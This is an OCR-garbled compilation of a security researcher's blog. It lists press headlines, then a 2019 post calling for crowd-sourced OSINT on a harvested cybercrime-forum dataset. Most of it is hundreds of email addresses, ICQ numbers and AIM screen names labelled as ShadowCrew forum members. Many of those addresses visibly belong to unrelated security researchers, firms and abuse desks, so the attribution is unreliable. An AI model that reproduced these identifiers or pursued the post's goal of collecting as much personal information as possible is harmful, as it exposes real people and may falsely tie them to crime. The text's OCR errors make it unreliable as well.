• [41]Zeus bot found using Amazon's EC2 as C &C server 

Research and News Articles covering my research 
and referencing me throughout - 2010: 

• [42]Firefox add-on encrypts sessions with Facebook, Twitter 

• [43]Watch out for malware with those pretty Mac 
screensavers 

• [44]Months-old Skype vulnerability exploited in the wild 

• [45]Danchev: Money mule recruiters 

• [46]Cybercrime's bulletproof hosting exposed 

• [47]Malware Threatens to Sue BitTorrent Downloaders 

• [48]Firefox add-on encrypts sessions with Facebook, Twitter 




• [49]Chuck Norris Botnet Karate-chops Routers Hard 

Research and News Articles covering my research 
and referencing me throughout - 2011: 

• [50]Kaspersky disputes McAfee's Shady Rat report 

• [51]Has EV-SSL Growth Been Slow? 

• [52]Report: Vishing Attack Targets Skype Users 

Research and News Articles covering my research 
and referencing me throughout - 2012: 

• [53]Fake UPS notices deliver malware 

• [54]ZeuS/Zbot Trojan Spread Through Rogue US Airways 
Email 

• [55]New Skype malware threat reported: Poison Ivy 

• [56]Five Koobface botnet suspects named by New York 
Times 

• [57]Virtual jihad: How real is the threat? 

• [58]ls the death knell sounding for traditional antivirus? 

• [59]Can the Nuclear exploit kit dethrone Blackhole? 
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• [60]Experts split over regulation for bounty-hunting bug 
sniffers 

• [61]Spammers Using Fake YouTube Notifications to Peddle 
Drugs 



• [62]Adele Bests Adderall As Affiliate Spammers Offer Music 
Downloads 

• [63]Bulgarian sleuth unveils botnet operators 

• [64]Fake PayPal Emails Distributing Malware 

• [65]Web Gang Operating in the Open 

• [66]ZeuS/Zbot Trojan Spread Through Rogue US Airways 
Email 

• [67]Buy 500 hacked Twitter accounts for less than a pint 

• [68]NBC.com Hacked, Infected With Citadel Trojan 

Research and News Articles covering my research 
and referencing me throughout - 2013: 

• [69]How Much Does A Botnet Cost? 

• [70]Automated YouTube account generator offered to cyber 
crooks 

• [71]Upgraded Modular Malware Platform Released in Black 
Market 

• [72]Deconstructing the Al-Qassam Cyber Fighters Assault 
on US Banks 

• [73]NBC hack infects visitors in 'drive by' cyberattack 

• [74]Bitcoins are being traded for hack tools 

• [75]New DIY Google Dorks Based Hacking Tool Released 

• [76]Hacking The TDoS Attack 



• [77]Mass website hacking tool alerts to dangers of Google 
dorks 

• [78]Cybercrime service automates creation of fake scanned 
IDs 

• [79]Spammers unleash DIY phone number slurping web 
tool 

• [80]Spam email contains malware, not Apple gift card 

• [81]APT1, that scary cyber-Cold War gang: Not even 
China's best 

• [82]Mass website hacking tool alerts to dangers of Google 
dorks 

• [83]C &C PHP script for staging DDoS attacks sold on 
underground forums 

• [84]Russian Malware-as-a-Service Offers Up Server Rentals 
for $240 a Pop 

• [85]Java exploit kit sells for $40 per day 

• [86]Buggy DIY botnet tool leaks in black market 

• [87]New DIY Google Dorks Based Hacking Tool Released 

• [88]Botnets for rent, criminal services sold in the 
underground market 
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• [89]Spam email contains malware, not Apple gift card 
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Announcing Law Enforcement and OSINT Intelligence 
Operation "Uncle George" - Join Me Today! 

(2019-10-16 20:16) 

Dear blog readers, 








Surprise, surprise! I wanted to let everyone know that I've 
spend a decent portion of my time crawling and 

actually harvesting and data mining 78 high-profile public 
Cybercrime Forum Communities basically consisting of 

1M raw OSINT data Web site pages harvested and ready for 
processing and enrichment. Dare to join the campaign? 

Keep reading and drop me a line at 
ddanchev@cryptogroup.net to coordinate and discuss 
including details on how 

to obtain free access to the 2019 Cybercrime Forum 
Community Data Set which is basically 18GB comprising of 
1M 

crawled and harvested Web sites from the most popular 
Public Cybercrime Forum Communities. 

Timeline of the Project including What You Need to 
Participate with the Ultimate Goal to Track Down the 

Individuals Behind These Communities and Actually 
Take Them Down: 

• Drop me a line at ddanchev@cryptogroup.net and let me 
know that you've downloaded it and that you're 

currently interested in participating in the project 

• Please coordinate with me what you plan to do with the 
archive in terms of possible raw OSINT enrichment 

and automated Social Network Analysis including sharing it 
with your Law Enforcement contacts or colleagues 

in your organization at dancho.danchev@hush.com 



• Grab a copy of Open Desktop Semantic Search - 
https://www.opensemanticsearch.org and process the archive 

• Grab a copy of Solr-Powered Local Yacy Search Engine - 
https://yacy.net and process the archive 
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• Grab a copy of Carrot2 - Open Source Search Results 
Clustering Engine - https://project.carrot2.org/ and connect it 
with Solr-Powered Local Yacy Search Engine and start 
processing the results and share the results with 

me at dancho.danchev@hush.com 

• Grab a copy of the following Statistical graphs generating 
tool - https://github.com/ko-ichi-h/khcoderand begin 

working on the archive 

The Objectives List: 

• Gather as much evidence for participation in fraudulent 
activity and shut down the community 

• Collect as much personal information as possible including 
loCs (Indicators of Compromises) Web site URLs 

including personal IM accounts and personal email addresses 

• Publicly publish the results of the crowd-sourced raw OSINT 
enrichment project campaign and ask everyone to 

reach out to their contacts in U.S Intelligence Community 
and international Law Enforcement to share the data 

and actively participate in the actual prosecution of the 
individuals behind these Cybercrime Forum Communi- 



ties and the actual take-down process 

• Share the data-set with as many academic Security 
Industry U.S Intelligence and international Law Enforcement 

contacts as possible 

Drop me a line at ddanchev@cryptogroup.net and let's get 
the campaign going! 

The results? Check out the following enriched raw OSINT 
graph which I managed to create for research pur¬ 
poses and to motivate you to participate. 
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Dimension 2 (0.171, 15.16%) 



Dimension 1 (0.2364, 20.96%) 
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shadow@shadowcrew.com 

idline@ziplip.com 

vengeance _l@ziplip.com 

cracker81@ziplip.com 

den5013@ziplip.com 

onthefringe@ziplip.com 

midhack@ziplip.com 

toastypimp@yahoo.com 

fakeid@ziplip.com 





anonraider@hotmail.com 

Ksnowylnc@ziplip.com 

spookycat911@ziplip.com 

Necromancer01@ziplip.com 

script4dumps@ukr.net 

dominican@ziplip.com 

rcwizard@ziplip.com 

CAYMAN@Vegas.zzn.com 

kahuna@mailvault.com 

nhlaxus@ziplip.com 

jamal@ziplip.com 

cam@mailvault.com 

stocksstocks@ziplip.com 

Dimmesdale@ziplip.com 

MiCRO _tECh@ziplip.com 
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vertiloto@blueyonder.co.uk 

ultrateckl46@aol.com 

ilithiumi@ziplip.com 

flashfire@ziplip.com 



p4lman@s-mail.com 

vikkingchick@aol.com 

emo _faulds@hotmail.com 

drumnhoouse@netscape.net 

scottlenord@yahoo.com 

rkj22@ziplip.com 

tec9@mailvault.com 

subuk01@hotmail.com 

malpadre _@hotmail.com 

kkmac2003@aol.com 

phoenixoz@hotmail.com 

natural _ice _59@hotmail.com 

chrisp92656@yahoo.com 

agent@inbox.nu 

shadiestfiveten@hotmail.com 

matrix _447@yahoo.com 

hockeymark99@hotmail.com 

circatropolis@email.com 

circatrooper@hotmail.com 

damned@damned.ro 



Ranger@mailvault.com 

poop@sex.com 

crazy _gm@hotmail.com 

pimpin _ken _op@hotmail.com 

slickrick@ziplip.com 

nons@usa.com 

wulfnacht@msn.com 

poofibgone@mailvault.com 

firewirelD@ziplip.com 

BlkOps@mailvault.com 

bikerbill@ziplip.com 

jwelsh@welshworks.com 

RichardKimble@mailvault.com 

yOrks@ziplip.com 

xdirc@mailvault.com 

jilsi@ziplip.com 

ji8si@hotmail.com 

JCDyer82@hotmail.com 

kill4kr@spray.se 

myleena@mailvault.com 



ccsupplier@ziplip.com 

bad _karma@ziplip.com 

cyptdog@homtail.com 

cyptdog@yahoo.com 

MrllntouchableSC@hotmail.com 

trance _boy3000@hotmail.com 
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MrBill@emaildownunder.com 

icemanl2@mailvault.com 

thegeko2002@yahoo.fr 

mcmf _violent J@hotmail.com 

djdonte@schoolsucks.com 

confidential@mutemail.com 

hiroshi _saito85@hotmail.com 

jorge28@hotmail.com 

jorgescalanter@yahoo.com 

mcscammer@ziplip.com 

esse@ziplip.com 

plasticbuyer@hotmail.com 

mad _carder@ziplip.com 



madcarder@aol.com 

dtraxor@hotmail.com 

clarolherbal@hotmail.com 

eddie _123@hotmail.com 

sales@perfectids.com 

digitaldemon@ziplip.com 

Pmal@ziplip.com 

sibba@ziplip.com 

slackerx@mailvault.com 

Chairmanoftheboard@ziplip.com 

BigTymeBallin@ziplip.com 

sharlton@hotmail.com 

willhemsley@hotmail.com 

rcwlzard@hotmail.com 

justlearning@hushmail.com 

sexyredl5@hotmail.com 

Mental _Hopscotch@hushmail.com 

e-talos@mailvault.com 

derezz404@hotmail.com 

nosoup4you@subdimension.com 



troymcl ure@ziplip.com 

ketamin _dream@hotmail.com 

telaviv2976us@yahoo.com 

verbalOg@yahoo.com 

verbalOg@msn.com 

saumurk@hotmail.com 

princeofpassionca@yahoo.ca 

gordie@ziplip.com 

djchepper@hotmail.com 

rudemuthafucka@imabadlittleboy.com 

unrealsecurity@mailvault.com 

glock911@mailvault.com 

geekusdeekus@hotmail.com 

tranceplastic@ziplip.com 

ozymandias@ziplip.com 

dutex@ziplip.com 

kamikavi@hotmail.com 
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GLOBEMAN@ziplip.com 

bluetreel955@hotmail.com 



bluetreel955@yahoo.com 

MiCRO _tECh@yahoo.com 

frotchman@hotmail.com 

Raptor@mailvault.com 

homeboy@protectmymail.com 

jonny _boy89@hotmail.com 

masquerade71id@hotmail.com 

masquerade71id@yahoo.com 

space-dog@ntlworld.com 

NeilPeart@ziplip.com 

deraw280@mailvault.com 

chingiz@gmx.net 

axecharlton@breathe.com 

nolbetta@ziplip.com 

petegr@ziplip.com 

Chemical _Kidd@hotmail.com 

trustfunded@hotmail.com 

boomsicka@ziplip.com 

cl2173@hotmail.com 

Top _Holos@yahoo.com 



phraud@ziplip.com 

counter_fit@ziplip.com 

PygmyShrew@ziplip.com 

gettowitch@ziplip.com 

khamkham@ziplip.com 

rogue _enc@hushmail.com 

ink@themusclezine.com 

IPgOsht@hotmail.com 

Thakid22@yahoo.com 

snowboardkid56@aol.com 

milkee2936@ziplip.com 

keithl569@mailvault.com 

gucciman _2003@yahoo.com 

gucciman _2003@hotmail.com 

Lrd Path@aol.com 

jesevski@hotmail.com 

alex _phukoff@hotmail.com 

aftermathl024@msn.com 

blazel669@yahoo.com 

mister_shaggy@hotmail.com 



tandrek@mailvault.com 

lawhack@ziplip.com 

bluebamboo49@yahoo.com 

whynot _@ziplip.com 

orders@terroristsupply.com 

scrub22003@yahoo.com.br 

minus9@mailvault.com 

thecreame@hotmail.com 
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jhosking77@yahoo.com.au 

usaru2001@yahoo.com 

blackice8636@ziplip.com 

omarhayyam2002@yahoo.com 

namon@mailvault.com 

DM6311@ziplip.com 

board _dokter2000@hotmail.com 

shaubarak@ziplip.com 

MR.HR@ziplip.com 

theamericanpsycho@ziplip.com 

ehlerssc@msu.edu 



meerakker@s-mail.com 

blackrob911@hotmail.com 

blackrob91@aol.com 

humpmike420@hotmail.com 

romainschwertz@pingnet.ch 

nightkrawler@ziplip.com 

drudown@ziplip.com 

veg@ziplip.com 

degreeuniversity@ziplip.com 

spunlinspunville@yahoo.com 

chewis393@hotmail.com 

chewis393@yahoo.com.mx 

dstephania@attbi.com 

locolive@ziplip.com 

og6@ziplip.com 

yeez@hotmail.com 

EvenOner@hotmail.com 

tonsoffun@ziplip.com 

grupopax@yahoo.com 

medellru@yahoo.com 



atownave@hotmail.com 

brynsterl@ziplip.com 

freddiez@hotmail.com 

mathieu690@gosympatico.ca 

sales@cooldegree.com 

Slaurworks@earthdome.com 

majjack@majjack.com 

dan Jopez99@hotmail.com 

SCjamalSC@yahoo.com 

koolhandluke@ziplip.com 

donnyisnaked@msn.com 

blackarmor@ziplip.com 

joe _quarterback@hotmail.com 

al _cappone22@hotmail.com 

i Juv _u _ro@yahoo.com 

No _Exit@hotmail.com 

back2daprimitive@hotmail.com 

freshintake@msn.com 

dival@ziplip.com 
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Feces@Poop.org 

visualise303@hotmail.com 

benstone@mailvault.com 

darktide@telusplanet.net 

tonystarx@ziplip.com 

ctroy@ziplip.com 

FraMd323@mailvault.com 

a _nightmare@mailvault.com 

spitphire@mail.ru 

jwillpromo@yahoo.com 

doggfortyfive@hotmail.com 

marthamoxley@mail.ru 

skulebasl01@hotmail.com 

neuby34@hotmail.com 

bigpickster@aol.com 

caligirl02@ziplip.com 

OOnytejadeOO@aol.com 

wolfram@ziplip.com 

bigbuyer@counterfeitcards.com 

hootsl967@hotmail.com 



Ace@Hole.com 

thessor@ziplip.com 

adamtoth@hotmail.com 

dieselino@usa.com 

wakes@ziplip.com 

crazyd9483@hotmail.com 

triple-sinner@ziplip.com 

midnyte@stormfeather.com 

tron@counterfeitcards.com 

jb604@hotmail.com 

Ali3nS3xFi3nd@msn.com 

emperordalek@zombieworld.com 

Southerner@Republican.com 

johnkimble@mailvault.com 

dr.p@ziplip.com 

deen _suleman@yahoo.com 

mycounter@ziplip.com 

tellatubbiesrko@aol.com 

los.angeless@fbl.gov 

freeman82@ziplip.com 



ukbadboy@ziplip.com 

flossboi@yahoo.com 

modestlygreat@hotmail.com 

modestlygreat@yahoo.com 

abaddon@802.llninja.net 

frostedflake@yahoo.com 

badnewstodd@ziplip.com 

cromm@quicksilver.net.nz 

badboyballads2000@yahoo.com 

xstreetsk8er487x@yahoo.com 

1053 

ccking@electricpenis.com 

gtelia@hotmail.com 

gteliaOO@yahoo.com 

sif@ziplip.com 

musha@phreaker.net 

thecatreturn@hotmail.com 

neiromantik@yahoo.com 

Byrd@flashmail.com 

ilalexil@hotmail.com 



shabazz@ziplip.com 

sp00f@ziplip.com 

platinumplus@ziplip.com 

5u5p3ct@cyber-rights.net 

polikking@mailvault.com 

willieo@ziplip.com 

waynewayne@ziplip.com 

ranxerox69@bolt.com 

linkpin34@aol.com 

OerO@mailvault.com 

jasonbourne@ziplip.com 

xminderbinderx@ziplip.com 

combattantdeliberte@ziplip.com 

nonzero@hush.com 

CANADIAN2001@ziplip.com 

shellydvained@yahoo.com 

jon@fakeiduk.co.uk 

PaulieStew@hotmail.com 

jeremyzamyslowski711@hotmail.com 

oofzpumba@yahoo.com 



oofzpumba@msn.com 

crackolic@hotmail.com 

carding@versa-us.com 

b _digital2k@hotmail.com 

alyn _peden@hotmail.com 

DebbieGroeneveldl92@hotmail.com 

kyndo@ziplip.com 

midhack@mailvault.com 

robertlowery _l@lycos.com 

jeffsm@ziplip.com 

swastikaeyes@ziplip.com 

Email@shadowcrew.com 

RyDen@ziplip.com 

thanxlinkpin34@aol.com 

slobodan2002@mail.ru 

plastic@counterfeitcards.com 

down@ftp.ttdown.com 

KyrON@zor.org 

ttdown@ftp3.ttdown.com 

fix@jsftp.fixdown.net 



perfectids@mailvault.com 
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BrianD@mailvault.com 

whatever@ziplip.com 

login@ziplip.com 

registry@forss.net 

martin.andersson@utfors.se 

krister.lenberg@utfors.se 

buyerguide@accountant.com 

intellegence@ziplip.com 

script4cc@ukr.net 

z-e-n@mailvault.com 

irisport@ziplip.com 

doink2@ziplip.com 

harro@ziplip.com 

plunger@mailvault.com 

CardGuy _1983@ziplip.com 

tazorak@yifan.net 

nouvou@ziplip.com 

mrsyndicate@mailvault.com 



wi leecoyote@ziplip.com 

yes@ilovelily.net 

qwert@ua.fm 

jdp@usermail.com 

bulkbuyer@usa.com 

osharifff@yahoo.fr 

fonefag@ziplip.com 

asheroner@ziplip.com 

eagle@eagle.org 

BadnewsBrown667@aol.com 

thanksalotman@hotmail.com 

thalus _private@mailvault.com 

skaplanllO@attbi.com 

shadowcrew@ziplip.com 

domain@zentek-international.com 

ni69az@yahoo.com 

thelistguy@ziplip.com 

ICE _Storm@ziplip.com 

macgyver@mailvault.com 

61476@xxxx.edu 



rocketchimpalpha@hotmail.com 

wolfram@consultant.com 

daidarek@hotmail.com 

admin@mypage.4all.cc 

leek@europe.com 

morzhov@bk.ru 

Blah@aol.com 

stayfly2udie@hotmail.com 

info@e-fidex.com 

krankmeup@mailvault.com 

blankcheck@hushmail.com 

s3ba@ziplip.com 
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ifyourinthebattle@ziplip.com 

kathy@fakeidman.org 

art@martinridley.com 

khameleon@ziplip.com 

stallionmover@scurtek.com 

Excise@ziplip.com 

bones _49 _5@hotmail.com 



Ieek@mail.com 

saint7@Cyber-rights.net 

kagney@ziplip.com 

XBand2040@mailvault.com 

TheBestofBC@ziplip.com 

caponeseller@mail.com 

smartcarder@yahoo.com 

knowledgeableone@hotmail.com 

knowledgeableone@quixer.com 

knowledgeablel@quixer.com 

poppy.crops@ziplip.com 

cc4me@hotmail.com 

deriva@ziplip.com 

scarface05@ziplip.com 

blackdog53@ziplip.com 

24609@ziplip.com 

midhack@verizon.net 

Deck@ziplip.com 

vitali@webmoney.ee 

silentmaori@hotmail.com 



thetussin@ziplip.com 

refy@ziplip.com 

Troublesome714@ziplip.com 

la-al@justice.gc.ca 

blueman77@ziplip.com 

knobs@oceanfree.net 

jburton@ziplip.com 

whatever@ebay.com 

miragegq@yahoo.com 

exids@ziplip.com 

defx@ziplip.com 

URsTrULylnNYC@aol.com 

shiva@computekservices.com 

Paulsmithinny@yahoo.com 

cjlax5@ziplip.com 

user@pm-shadowcrew.com 

meerakker@pm-shadowcrew.com 

kickman@ziplip.com 

thesoupnazi@ziplip.com 

importuner@ziplip.com 



vlpee@e-mail.ru 

patryn@ziplip.com 

aladdin275@yahoo.com 
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capaefex@ziplip.com 

walterwolf@ziplip.com 

SLiPz@ziplip.com 

iisps@ziplip.com 

alexei _d@mail.ru 

sharon@captix.com 

magog@ziplip.com 

jayare@ziplip.com 

webappsec@securityfocus.com 

novidus@ziplip.com 

ttboafact@canada.com 

Ziffnavi@fitec.co.jp 

perfectionist2003@ziplip.com 

bigbuyer@gmx.net 

mrnoface@ziplip.com 

info@photoidcards.com 



kidd@ziplip.com 

ben@getwasted.net 

CT _man@ziplip.com 

idcrisis@ziplip.com 

soccccerguy@hotmail.com 

shadowdonations@ziplip.com 

you@shadowcrew.com 

mobties@ziplip.com 

calitaliban@ziplip.com 

admin.buu@loxinfo.ac.th 

route@infonexus.com 

momomania@hotmail.com 

Namechange@ziplip.com 

salve2001@ziplip.com 

Gateway2000@ziplip.com 

Slayer@Kraix.com 

great.cc4me@hotmail.com 

cc@scriptsjob.com 

shadowmembership@ziplip.com 

Sigma@DNS-CORE.com 



admin@shadowcrew.com 

tom333@ziplip.com 

sadf@lCust31.tntl.minneapolis.mn.da.uu.net 

mrmojorising@ziplip.com 

security mi nd@tut. by 

teslinsupply@yahoo.com 

restoration656@hotmail.com 

hara@ypn.co.uk 

IQ163@ziplip.com 

lex@mindvox.phantom.com 

lex@stormking.com 

jzamyslowski711@hotmail.com 

Thedude@aol.com 

cl@counterfeitlibrary.com 
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kestra@ziplip.com 

capone420@ziplip.com 

hpouches@yahoo.com 

gollumfun@ziplip.com 

degreeuniversity@hotmail.com 



akingston@ziplip.com 

customitnow@ziplip.com 

Eloheem@ziplip.com 

blacks@mail.com 

joe@innerhost.com 

canuck@ziplip.com 

canuck@amadeupemailaddressidonthaveaccessto.com 

spit-fi re@ziplip.com 

sales@closedcollege.com 

billing@Phantominfo.com 

cham@ua.fm 

Fontaine420@ziplip.com 

Creep01@ziplip.com 

dammit@ziplip.com 

gollumfun@hushmail.com 

domains@aol.net 

abuse@aol.net 

noc@aol.net 

kaliberx@ziplip.com 

info@professionaldegrees.com 



info@penningtonu.com 

kingofthefoothill@hotmail.com 

pridget@dbzmail.com 

interception@mail.com 

080120@ziplip.com 

werewolf@gmx.net 

fgmpl23@ziplip.com 

Cyphon@ziplip.com 

cplanet@ziplip.com 

legal@shadowcrew.com 

stuffx@ziplip.com 

nobody@sigma.dns-core.com 

E17sblx-0000F6-00@sigma.dns-core.com 

team@verizon.net 

dogwood70@ziplip.com 

team@adultfriendfinder.com 

username@NOSPAM.domain.com 

tdog@myself.com 

ralph@doncaster.on.ca 

realplastic@gmx.net 



you@hush.com 

you@elitefitness.com 

DR.Smith@belizeweb.com 

Iighthawk4@ziplip.com 

ampersona@ziplip.com 
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lancelotlink@ziplip.com 

mhall@netcom.com 

pvthc@ziplip.com 

chbigben@ziplip.com 

drift@ziplip.com 

mac _addictl984@yahoo.com 

littletommy@ziplip.com 

FireWire@ziplip.com 

firewire7@hotmail.com 

renegadellK@ziplip.com 

zidaneiv@hotmail.com 

wldnczy@ziplip.com 

fakelDusa@ziplip.com 

thelandonly@ziplip.com 



GiB _Uk@ziplip.com 

jonl01@ziplip.com 

helpwanted@ziplip.com 

email.Ill _barcode _lll@ziplip.com 

Tz2@ziplip.com 

madrid@ziplip.com 

Artyanon@mailvault.com 

utax@inbox.lv 

saradonne@ziplip.com 

perfectids@yahoo.com 

blackarmor@eurosport.com 

kkimmel@terroristsupply.com 

idline@mailvault.com 

dr@dursec.com 

rongula31@hotmail.com 

ken.williams@ey.com 

roesch@sourcefi re.com 

fygrave@scorpions.net 

vision@whitehats.com 

rfp@wiretrip.net 



alephl@securityfocus.com 

wooc@powersurfr.com 

apr.inc@powersurfr.com 

conroy.badger@powersurfr.com 

crystal@positioning-research.com 

jason.dorie@blackboxgames.com 

darryl _turner@yahoo.com 

mrandles@softhome.net 

vizuelle@eudoramail.com 

fyodor@insecure.org 

spikeman@spikeman.net 

lance@spitzner.net 

listuser@seifried.org 

mfranz@cisco.com 

phillip.ibis@blackboxgames.com 

cwallace@exceedia.com 
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priest@sfu.ca 

hdm@digitaloffense.net 

rhamel@kpmg.ca 



nico@securite.org 

kaneda@securite.org 

dsward9s@pacbell.net 

andy@dragonfly.demon.co.uk 

ktwo@ktwo.ca 

kinksterl@shaw.ca 

ajarman@metacomcorp.com 

zindelak@telusplanet.net 

jeff@wwti.com 

smkoen@hotmail.com 

cwilson2@kpmg.ca 

newspixie@hotmail.com 

mock@obscurity.org 

j@lords.com 

ksoze@obscurity.org 

f ra n k@ a tsta ke. c o m 

fishy@powersurfr.com 

cakeislove@hotmail.com 

tiffany _kary@zd.com 

stephenn@powersurfr.com 



webmaster@pneumafables.com 

bsapiro@kpmg.ca 

kmx@egatobas.org 

hectorh@pobox.com 

emmanuel@relaygroup.com 

vanja@vanja.com 

dje@bht.com 

dugsong@monkey.org 

lyndon@orthanc.ab.ca 

mts@off.off.to 

paudley@blackcat.ca 

robert_david _graham@yahoo.com 

spambait-kyx@inetgrity.com 

chris@obscurity.org 

peter _wong@pmc-sierra.com 

janet@lomas.ab.ca 

dfreelove@yottayotta.com 

dowen@intravelnet.com 

randlest@oanet.com 

jay@bastille-linux.org 



phil@ccc-ltd.com 

jed@pickel.net 

gshipley@neohapsis.com 

deraison@cvs.nessus.org 

maxx@securite.org 

mixter@newyorkoffice.com 

deraadt@cvs.openbsd.org 
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dittrich@cac.washington.edu 

bgreenbaum@securityfocus.com 

neil@bortnak.com 

annemarie@counterpane.com 

chris.kuethe@ualberta.ca 

bob.beck@ualberta.ca 

tan@atstake.com 

natasha@snort.org 

arr@watson.org 

aempirei@ucla.edu 

ggolomb@enterasys.com 

jfrank@b-ap.com 



robert@infoserf.net 

kkuehl@cisco.com 

donna.andert@sun.com 

bmc@snort.org 

jgary@clicktosecure.com 

jpavlick@sourcefire.com 

talisker@networkintrusion.co.uk 

jwalchuc@enterasys.com 

itay@imc.nl 

halvar@blackhat.com 

ppY@ldealRealms.com 

forrest@code-lab.com 

mconley@atstake.com 

jennifer@granick.com 

scott@microsoft.com 

ah@securityfocus.com 

cruci@hwa-security.net 

solar@openwall.com 

ivan.arce@corest.com 

rlogan@camisade.com 



cmg@uab.edu 

jed@grep.net 

vOnelmO@best.com 

snorthcutt@hawaiian.net 

frank@ccc.de 

dmckay@microsoft.com 

jwilkins@bitland.net 

kf@gnosys.biz 

unlearn@ne.mediaone.net 

jpr5@darkridge.com 

shok@dataforce.net 

thegnome@nmrc.org 

ofir@sys-security.com 

provos@umich.edu 

silvio@big.net.au 

mike@infonexus.com 

crispin@wirex.com 

halfdead@phear.org 
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niness@devilness.org 



curtis.king@messagingdirect.com 

rob@incident-response.org 

kam@aversion.net 

fuk@ghettobox.eurocompton.net 

merharm@wra.net 

zmagic@phear.org 

inter@logos.relcom.ru 

alive@blazinfyre.net 

daemon@esmith.geezernet.nu 

nwonknu@dsl-65-187-119-141.telocity.com 

abramelon@cpn.cookchildrens.org 

thegnome@nrmc.org 

me@btinternet.com 

Administrator@hotmail.com 

redeemer@gOtrOOt.net 

bOiler@hotmail.com 

who@radiofreesatan.com 

poolemit@mailvault.com 

fuckyoutxtax@hell.com 

proxydialup@yahoo.com 



info@megastep.com 

sales@diplomaone.com 

abuse@teledisnet.be 

N0C@sprint.net 

dvlpmntsftwr@hotmail.com 

stepgas@hotmail.com 

rra33@hotmail.com 

cody@server.snni.com 

kwparris@csuh.alunlink.com 

wolfram@counterfeitcards.com 

whoever@hotmail.com 

Sample Public ICQ UIN Numbers of ShadowCrew 
Cybercrime Forum Community circa 2002-2004: 

999008 

9773639 

974763 

97254007 

95211861 

92754913 


914506 



89531566 


8923240 

86958674 

802820 

777726 

1062 

74623265 

7444304 

690033 

6666666 

637321 

62527577 

598629 

59838986 

56714884 

56327073 

5556665 

517196 

48721062 


47564547 



4545 


44203686 

41781 

3727374 

362563 

35 

348140 

33342322 

332163 

330332251 

327539466 

320455282 

320100851 

319326887 

31485639 

304060 

29457002 

288687540 

288670074 


266472842 



26633491 


264975608 

2482045 

236790331 

230406 

222567486 

222409185 

22063094 

219747908 

21386767 

213201784 

212719246 

19457815 

193200333 

1881621 

179251032 

1063 

178954300 

178832228 


178420526 



178210999 


178101166 

178020075 

177541908 

177507739 

177394922 

177016428 

176824746 

176531816 

175688952 

175596058 

175521773 

175350857 

175308348 

175157730 

174902318 

174760817 

174537112 

174511919 


174445299 



173846049 


173838529 

173767788 

17359522 

173387414 

173299970 

173254582 

173019781 

173002204 

172674035 

172476811 

172290141 

172252866 

172021743 

171975533 

171805992 

1715300002 

171468368 

171440228 


170627352 



170324565 


170036758 

169769760 

169243371 

169220281 

169006693 

168834059 

1064 

168769080 

168675160 

168595955 

168495889 

168422846 

168413916 

167927175 

167897380 

167636937 

167023436 

166657595 


166581197 



166407706 


165969755 

165638624 

165546617 

164872312 

164165878 

164008345 

162852265 

1601617 

158807983 

15652907 

154866004 

152616 

150860495 

139736678 

130915854 

11402050 

1111111 

10966997 


107021 



105233239 


103363810 

100631 

100161 

Sample Public IM User Names of ShadowCrew 
Cybercrime Forum Community circa 2002-2004: 

aim:goim?screenname=youngglobeman 

&message=Hello+Are+you+there? 

aim:goim?screenname=yeezzOr 

&message=Hello+Are+you+there? 

aim:goim?screenname=xkyroutx 

&message=Hello+Are+you+there? 

aim:goim?screenname=wisie459 

&message=Hello+Are+you+there? 

aim:goim?screenname=whailen 

&message=Hello+Are+you+there? 

aim:goim?screenname=wgrumpke 

&message=Hello+Are+you+there? 
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aim:goim?screenname=verbalOg 

&message=Hello+Are+you+there? 

aim:goim?screenname=unbreakable2009 

&message=Hello+Are+you+there? 



aim:goim?screenname=TopHolos 

&message=Hello+Are+you+there? 

aim:goim?screenname=thenightmaresx 

&message=Hello+Are+you+there? 

aim:goim?screenname=thelistguysc 

&message=Hello+Are+you+there? 

aim:goim?screenname=theblinkstudl82 

&message=Hello+Are+you+there? 

aim:goim?screenname=Tandrek 

&message=Hello+Are+you+there? 

aim:goim?screenname=t909j 

&message=Hello+Are+you+there? 

aim:goim?screenname=tOastypimp 

&message=Hello+Are+you+there? 

aim:goim?screenname=SpacemanSpiff742 

&message=Hello+Are+you+there? 

aim:goim?screenname=sp+e+ar+legolas 

&message=Hello+Are+you+there? 

aim:goim?screenname=someguy798 

&message=Hello+Are+you+there? 

aim:goim?screenname=SomeCallMe+Byrd 

&message=Hello+Are+you+there? 

aim:goim?screenname=Sly+Immigrant 
&message=Hello+Are+you+there? 


aim:goim?screenname=sirnoface 

&message=Hello+Are+you+there? 



aim:goim?screenname=Sir+Aristrotle 

&message=Hello+Are+you+there? 


aim:goim?screenname=shaubarak 

&message=Hello+Are+you+there? 

aim:goim?screenname=shady lady 18693 
&message=Hello+Are+you+there? 

aim:goim?screenname=shady007 

&message=Hello+Are+you+there? 

aim:goim?screenname=Screen+Serv 
&message=Hello+Are+you+there? 

aim:goim?screenname=ScottScurlock 

&message=Hello+Are+you+there? 

aim:goim?screenname=Sconoscuito 

&message=Hello+Are+you+there? 

aim:goim?screenname=SC+Talos 

&message=Hello+Are+you+there? 

aim:goim?screenname=savemejebusl79 

&message=Hello+Are+you+there? 

aim:goim?screenname=retarded+shit 

&message=Hello+Are+you+there? 

aim:goim?screenname=redundantcheese 

&message=Hello+Are+you+there? 

aim:goim?screenname=redbossaline 

&message=Hello+Are+you+there? 

aim:goim?screenname=rawistravis 

&message=Hello+Are+you+there? 



aim:goim?screenname=psndudel 

&message=Hello+Are+you+there? 

aim:goim?screenname=progressiveccna 

&message=Hello+Are+you+there? 

aim:goim?screenname=platinum54door 

&message=Hello+Are+you+there? 

aim:goim?screenname=phs2602 

&message=Hello+Are+you+there? 

aim:goim?screenname=pg043 

&message=Hello+Are+you+there? 

aim:goim?screenname=perfectids 

&message=Hello+Are+you+there? 

aim:goim?screenname=pbusheOOO 

&message=Hello+Are+you+there? 

aim:goim?screenname=overviewband 

&message=Hello+Are+you+there? 

aim:goim?screenname=ourorgasms 

&message=Hello+Are+you+there? 

aim:goim?screenname=Original + Boski 
&message=Hello+Are+you+there? 

aim:goim?screenname=oofzpumba 

&message=Hello+Are+you+there? 

aim:goim?screenname=octane 
&message=Hello+Are+you+there? 

aim:goim?screenname=novidus 

&message=Hello+Are+you+there? 



aim:goim?screenname=NONE 

&message=Hello+Are+you+there? 

aim:goim?screenname=none 

&message=Hello+Are+you+there? 

aim:goim?screenname=Nobel c4t 
&message=Hello+Are+you+there? 

aim:goim?screenname=NiggaDJackingDaHole 

&message=Hello+Are+you+there? 

aim:goim?screenname=na 

&message=Hello+Are+you+there? 

aim:goim?screenname=N/A 

&message=Hello+Are+you+there? 

aim:goim?screenname=mwdropout 

&message=Hello+Are+you+there? 

aim:goim?screenname=mustophamond 

&message=Hello+Are+you+there? 

aim:goim?screenname=mtnhardwarel21 

&message=Hello+Are+you+there? 
